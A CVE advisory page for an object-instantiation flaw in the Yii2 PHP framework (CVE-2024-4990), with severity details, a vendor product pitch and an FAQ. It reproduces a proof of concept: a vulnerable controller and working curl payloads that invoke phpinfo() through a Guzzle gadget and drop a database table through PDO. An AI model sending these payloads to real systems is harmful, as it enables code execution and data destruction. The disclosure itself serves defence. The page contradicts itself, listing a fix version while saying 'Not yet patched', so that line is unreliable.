CVE-2024-4990

CVE-2024-4990 is a high-severity security vulnerability in yiisoft/yii2 (composer), affecting versions < 2.0.49.4. It is fixed in 2.0.49.4.

Summary

Yii2 supports attaching Behaviors to Components by setting properties having the format 'as <behaviour-name>'.

Internally this is done using the __set() magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using Yii::createObject($value). However, there is no validation check that verifies that $value is a valid Behavior class name or configuration. An attacker that can control the content of the $value variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.

Workarounds

No Work around available

References

Reported Here

in case the link is dead, here is the full description

Description

Yii2 supports attaching Behaviors to Components by setting properties having the format 'as <behaviour-name>'.

Internally this is done using the __set() magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using Yii::createObject($value). However, there is no validation check that verifies that $value is a valid Behavior class name or configuration. An attacker that can control the content of the $value variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.

Depending on the installed dependencies various kind of attacks are possible.

Proof of Concept

A PoC application was created using composer create-project, as specified in the getting started.

Yii JSON parser was enabled in the configuration:

'parsers' => [ 'application/json' => 'yii\web\JsonParser' ]

A vulnerable controller was added:

<?php

namespace app\controllers;

use yii\base\Component;
use yii\web\Controller;

class ExploitableController extends Controller
{
    public function beforeAction($action): bool
    {
        // Needed only to simplify the PoC
        $this->enableCsrfValidation = false;
        return parent::beforeAction($action);
    }

    public function actionVulnerable(): string
    {
        $fields = $this->request->post();
        $myComponent = new Component();
        foreach ($fields as $key => $value) {
            $myComponent->$key = $value;
        }
        return "";
    }
}

Executing phpinfo()

Following command stores the content of phpinfo() inside info.html:

curl -XPOST -H "Content-Type: application/json" -d '{"as hack": {"__class":"GuzzleHttp\\Psr7\\FnStream", "__construct()": [[]], "_fn_close": "phpinfo"}}' http://localhost:8080/index.php?r=exploitable%2Fvulnerable > info.html

It leverages the fact that GuzzleHttp\Psr7\FnStream class executes call_user_func($this->_fn_close) inside __destruct(). This class is a default dependency.

Executing arbitrary MySQL queries (blind execution)

If the application is connected to a MySQL database it is possible to exploit the PDO class to execute arbitrary SQL queries:

curl -XPOST -H "Content-Type: application/json" -d '{"as hack": {"__class":"\\PDO", "__construct()": ["mysql:host=127.0.0.1;dbname=test", "test", "test", {"1002": "DROP TABLE test"}]}}' http://localhost:8080/index.php?r=exploitable%2Fvulnerable

Notice that the server will always return a 500 Internal Server Error (because the instantiated class is not a Behavior), however the query is executed, even if we can't receive any output from it. If the query fails we might see a PDO error message (i.e. "Table 'test.foo' doesn't exist"), depending on the app configuration.

Impact

It is not trivial to exploit this bug, because it depends on peculiar characteristics of the target application. However, it looks that there is at least one very popular product built on Yii2 that is severely affected by this vulnerability (allowing to an anonymous user to gain admin access, with an easy exploit).

The consequences of the exploitation could vary from retrieving sensitive information to DoS or unauthorized access.

Occurrences

Component.php L191

Impact

With some effort malicious code can be injected executed which might be anything ranging from deleting files to dropping database tables

CVE-2024-4990 has a CVSS score of 8.1 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.0.49.4); upgrading removes the vulnerable code path.

Affected versions

yiisoft/yii2 (< 2.0.49.4)

Security releases

yiisoft/yii2 → 2.0.49.4 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Not yet patched.

Frequently Asked Questions

  1. What is CVE-2024-4990? CVE-2024-4990 is a high-severity security vulnerability in yiisoft/yii2 (composer), affecting versions < 2.0.49.4. It is fixed in 2.0.49.4.
  2. How severe is CVE-2024-4990? CVE-2024-4990 has a CVSS score of 8.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of yiisoft/yii2 are affected by CVE-2024-4990? yiisoft/yii2 (composer) versions < 2.0.49.4 is affected.
  4. Is there a fix for CVE-2024-4990? Yes. CVE-2024-4990 is fixed in 2.0.49.4. Upgrade to this version or later.
  5. Is CVE-2024-4990 exploitable, and should I be worried? Whether CVE-2024-4990 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2024-4990 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2024-4990? Upgrade yiisoft/yii2 to 2.0.49.4 or later.

Other vulnerabilities in yiisoft/yii2

CVE-2024-58136CVE-2024-4990CVE-2024-32877CVE-2015-5467CVE-2015-3397

Stop the waste.
Protect your environment with Kodem.